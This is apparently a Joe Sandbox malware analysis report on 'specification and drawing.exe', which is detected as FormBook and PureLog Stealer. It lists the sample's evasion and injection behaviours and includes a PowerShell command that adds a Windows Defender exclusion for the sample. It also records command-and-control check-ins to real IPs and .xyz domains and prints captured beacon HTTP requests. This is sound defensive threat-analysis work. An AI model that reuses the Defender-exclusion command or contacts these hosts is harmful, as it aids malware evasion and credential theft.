Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
specification and drawing.exe

Overview

General Information

Sample name:specification and drawing.exe
Analysis ID:1566626
MD5:8941cbf2cdd44ecfe97f45a2fed0d94f
SHA1:3dbed0eb010422bf5cd364da77e6f22abc27439c
SHA256:d785e400857a1fea973e9b1fdff8d1a31c4ffdf0aec99bcddf19a2107b230849
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • specification and drawing.exe (PID: 6316 cmdline: "C:\Users\user\Desktop\specification and drawing.exe" MD5: 8941CBF2CDD44ECFE97F45A2FED0D94F)
    • powershell.exe (PID: 3196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • specification and drawing.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\specification and drawing.exe" MD5: 8941CBF2CDD44ECFE97F45A2FED0D94F)
      • LfvKCNKdvt.exe (PID: 6480 cmdline: "C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • wscript.exe (PID: 368 cmdline: "C:\Windows\SysWOW64\wscript.exe" MD5: FF00E0480075B095948000BDC66E81F0)
          • LfvKCNKdvt.exe (PID: 2488 cmdline: "C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4852 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.2187012973.00000000056C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        0000000A.00000002.4592454426.0000000004B70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.2401176438.0000000001030000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            0.2.specification and drawing.exe.56c0000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.specification and drawing.exe.3de24c8.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                4.2.specification and drawing.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  4.2.specification and drawing.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                    0.2.specification and drawing.exe.3de24c8.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 2 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\specification and drawing.exe", ParentImage: C:\Users\user\Desktop\specification and drawing.exe, ParentProcessId: 6316, ParentProcessName: specification and drawing.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", ProcessId: 3196, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\specification and drawing.exe", ParentImage: C:\Users\user\Desktop\specification and drawing.exe, ParentProcessId: 6316, ParentProcessName: specification and drawing.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", ProcessId: 3196, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\specification and drawing.exe", ParentImage: C:\Users\user\Desktop\specification and drawing.exe, ParentProcessId: 6316, ParentProcessName: specification and drawing.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe", ProcessId: 3196, ProcessName: powershell.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-02T14:37:23.348290+010028554651A Network Trojan was detected192.168.2.649786185.106.176.20480TCP
                      2024-12-02T14:37:48.438381+010028554651A Network Trojan was detected192.168.2.6498433.33.130.19080TCP
                      2024-12-02T14:38:11.840591+010028554651A Network Trojan was detected192.168.2.6498955.39.10.9380TCP
                      2024-12-02T14:38:28.045617+010028554651A Network Trojan was detected192.168.2.649932194.58.112.17480TCP
                      2024-12-02T14:38:42.952516+010028554651A Network Trojan was detected192.168.2.649968209.74.64.18780TCP
                      2024-12-02T14:38:57.778717+010028554651A Network Trojan was detected192.168.2.6500053.33.130.19080TCP
                      2024-12-02T14:39:12.753071+010028554651A Network Trojan was detected192.168.2.6500143.33.130.19080TCP
                      2024-12-02T14:39:27.662406+010028554651A Network Trojan was detected192.168.2.6500193.33.130.19080TCP
                      2024-12-02T14:40:03.919439+010028554651A Network Trojan was detected192.168.2.65002347.238.157.25380TCP
                      2024-12-02T14:40:18.811723+010028554651A Network Trojan was detected192.168.2.65002867.223.117.16980TCP
                      2024-12-02T14:40:34.109265+010028554651A Network Trojan was detected192.168.2.65003285.159.66.9380TCP
                      2024-12-02T14:40:51.358045+010028554651A Network Trojan was detected192.168.2.650036162.159.140.10480TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-02T14:37:40.431518+010028554641A Network Trojan was detected192.168.2.6498233.33.130.19080TCP
                      2024-12-02T14:37:43.060663+010028554641A Network Trojan was detected192.168.2.6498313.33.130.19080TCP
                      2024-12-02T14:37:45.767106+010028554641A Network Trojan was detected192.168.2.6498373.33.130.19080TCP
                      2024-12-02T14:38:03.860734+010028554641A Network Trojan was detected192.168.2.6498785.39.10.9380TCP
                      2024-12-02T14:38:06.522400+010028554641A Network Trojan was detected192.168.2.6498855.39.10.9380TCP
                      2024-12-02T14:38:09.244441+010028554641A Network Trojan was detected192.168.2.6498905.39.10.9380TCP
                      2024-12-02T14:38:20.003806+010028554641A Network Trojan was detected192.168.2.649912194.58.112.17480TCP
                      2024-12-02T14:38:22.741439+010028554641A Network Trojan was detected192.168.2.649919194.58.112.17480TCP
                      2024-12-02T14:38:25.323599+010028554641A Network Trojan was detected192.168.2.649925194.58.112.17480TCP
                      2024-12-02T14:38:34.909485+010028554641A Network Trojan was detected192.168.2.649948209.74.64.18780TCP
                      2024-12-02T14:38:37.535393+010028554641A Network Trojan was detected192.168.2.649956209.74.64.18780TCP
                      2024-12-02T14:38:40.199515+010028554641A Network Trojan was detected192.168.2.649962209.74.64.18780TCP
                      2024-12-02T14:38:49.826932+010028554641A Network Trojan was detected192.168.2.6499853.33.130.19080TCP
                      2024-12-02T14:38:52.740601+010028554641A Network Trojan was detected192.168.2.6499923.33.130.19080TCP
                      2024-12-02T14:38:55.123139+010028554641A Network Trojan was detected192.168.2.6499993.33.130.19080TCP
                      2024-12-02T14:39:04.698870+010028554641A Network Trojan was detected192.168.2.6500113.33.130.19080TCP
                      2024-12-02T14:39:07.450410+010028554641A Network Trojan was detected192.168.2.6500123.33.130.19080TCP
                      2024-12-02T14:39:10.033043+010028554641A Network Trojan was detected192.168.2.6500133.33.130.19080TCP
                      2024-12-02T14:39:19.685126+010028554641A Network Trojan was detected192.168.2.6500153.33.130.19080TCP
                      2024-12-02T14:39:22.359225+010028554641A Network Trojan was detected192.168.2.6500173.33.130.19080TCP
                      2024-12-02T14:39:25.072867+010028554641A Network Trojan was detected192.168.2.6500183.33.130.19080TCP
                      2024-12-02T14:39:35.541607+010028554641A Network Trojan was detected192.168.2.65002047.238.157.25380TCP
                      2024-12-02T14:39:38.213543+010028554641A Network Trojan was detected192.168.2.65002147.238.157.25380TCP
                      2024-12-02T14:39:40.885385+010028554641A Network Trojan was detected192.168.2.65002247.238.157.25380TCP
                      2024-12-02T14:40:10.782145+010028554641A Network Trojan was detected192.168.2.65002567.223.117.16980TCP
                      2024-12-02T14:40:13.518956+010028554641A Network Trojan was detected192.168.2.65002667.223.117.16980TCP
                      2024-12-02T14:40:16.194628+010028554641A Network Trojan was detected192.168.2.65002767.223.117.16980TCP
                      2024-12-02T14:40:26.244876+010028554641A Network Trojan was detected192.168.2.65002985.159.66.9380TCP
                      2024-12-02T14:40:28.917219+010028554641A Network Trojan was detected192.168.2.65003085.159.66.9380TCP
                      2024-12-02T14:40:31.588702+010028554641A Network Trojan was detected192.168.2.65003185.159.66.9380TCP
                      2024-12-02T14:40:41.494889+010028554641A Network Trojan was detected192.168.2.650033162.159.140.10480TCP
                      2024-12-02T14:40:44.683670+010028554641A Network Trojan was detected192.168.2.650034162.159.140.10480TCP
                      2024-12-02T14:40:48.511975+010028554641A Network Trojan was detected192.168.2.650035162.159.140.10480TCP
                      2024-12-02T14:40:58.451663+010028554641A Network Trojan was detected192.168.2.650037208.91.197.2780TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-02T14:37:40.431518+010028563181A Network Trojan was detected192.168.2.6498233.33.130.19080TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: specification and drawing.exeAvira: detected
                      Source: http://www.restobarbebek.xyz/jm9b/Avira URL Cloud: Label: malware
                      Source: specification and drawing.exeReversingLabs: Detection: 65%
                      Source: Yara matchFile source: 4.2.specification and drawing.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.specification and drawing.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4592454426.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2401176438.0000000001030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4590637504.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4590687371.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4589607610.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2402440519.0000000001E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: specification and drawing.exeJoe Sandbox ML: detected
                      Source: specification and drawing.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: specification and drawing.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: wscript.pdbGCTL source: specification and drawing.exe, 00000004.00000002.2400903312.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000003.2330616460.000000000154B000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000002.4585989966.000000000156E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LfvKCNKdvt.exe, 00000007.00000002.4581617841.00000000005BE000.00000002.00000001.01000000.0000000C.sdmp, LfvKCNKdvt.exe, 0000000A.00000000.2476050477.00000000005BE000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: specification and drawing.exe, 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2403171986.00000000046FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2400714562.0000000004541000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: specification and drawing.exe, specification and drawing.exe, 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, wscript.exe, 00000008.00000003.2403171986.00000000046FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2400714562.0000000004541000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wscript.pdb source: specification and drawing.exe, 00000004.00000002.2400903312.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000003.2330616460.000000000154B000.00000004.00000020.00020000.00000000.sdmp, LfvKCNKdvt.exe, 00000007.00000002.4585989966.000000000156E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0076C7A0 FindFirstFileW,FindNextFileW,FindClose,8_2_0076C7A0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then xor eax, eax8_2_00759F20
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then mov ebx, 00000004h8_2_047B04CE

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49786 -> 185.106.176.204:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49823 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.6:49823 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49831 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49837 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49878 -> 5.39.10.93:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49843 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49890 -> 5.39.10.93:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49885 -> 5.39.10.93:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49895 -> 5.39.10.93:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49912 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49968 -> 209.74.64.187:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49948 -> 209.74.64.187:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49932 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49962 -> 209.74.64.187:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49925 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49919 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49956 -> 209.74.64.187:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50005 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50019 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50017 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50012 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 47.238.157.253:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50032 -> 85.159.66.93:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 67.223.117.169:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 85.159.66.93:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 85.159.66.93:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50037 -> 208.91.197.27:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 67.223.117.169:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50036 -> 162.159.140.104:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50033 -> 162.159.140.104:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50023 -> 47.238.157.253:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 67.223.117.169:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50014 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 85.159.66.93:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50034 -> 162.159.140.104:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50028 -> 67.223.117.169:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50035 -> 162.159.140.104:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 3.33.130.190:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 47.238.157.253:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 47.238.157.253:80
                      Source: DNS query: www.swenansiansie.xyz
                      Source: DNS query: www.mp3cevir.xyz
                      Source: DNS query: www.restobarbebek.xyz
                      Source: Joe Sandbox ViewIP Address: 209.74.64.187 209.74.64.187
                      Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                      Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /enzp/?aNXP_jw=cVkvAZaY29GpnsZyqIF2yuifFE7HKV6pnqAC3WUldb4fq/7Oh6qhLNzjv12xoDmrSb6mv5wmBpstJhqJzvfwudLk3JbApDF6kA+gMwLx/u/2nNZzSM95XnZVFjyCoQq4ImYZsuE=&cTT8u=Q4NHoHJ0 HTTP/1.1Host: www.sidqwdf.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                      Source: global trafficHTTP traffic detected: GET /08fk/?aNXP_jw=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a787TBpev3CA9JKuvjWbz5jcDVeWMoitqZ3m3uhcYDsapTcVm+CQ=&cTT8u=Q4NHoHJ0 HTTP/1.1Host: www.swenansiansie.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
